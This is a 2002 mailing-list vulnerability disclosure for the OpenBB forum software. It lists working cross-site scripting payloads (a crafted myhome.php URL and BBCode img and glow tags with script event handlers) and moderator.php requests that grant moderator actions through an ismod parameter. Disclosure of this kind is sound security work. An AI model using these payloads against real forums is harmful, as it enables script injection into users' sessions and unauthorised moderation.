Security holes in OpenBB

From: frog frog (leseulfrog@hotmail.com)
Date: 05/23/02


Date: 23 May 2002 19:31:05 -0000
From: frog frog <leseulfrog@hotmail.com>
To: vuln-dev@securityfocus.com


('binary' encoding is not supported, stored as-is)

Product :
OpenBB
http://www.prolixmedia.com

Versions :
1.0.0 RC3 (and less ?)

Problems :
- XSS
- Access to moderators' options

Exploits :
- /myhome.php?action=messages&box=<*form%20name=a><input%
20name=i%20value=XSS></*form><*script>alert
(document.a.i.value)</*script>

- [img]http://" onerror="[SCRIPT]"[/img]

- [glow tcolor=')" onmouseover="[SCRIPT]" nothing="('hop,
fcolor=red, size=100]HUHUHU[/glow]

- moderator.php?action=lock&TID=FORUMID&ismod=1
moderator.php?action=lock&TID=FORUMID&ismod=1&status=1

- etc ...

More details in french :
http://www.ifrance.com/kitetoua/tuto/OpenBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%
2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FOpenBB.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%
2Flanguage_tools

frog-m@n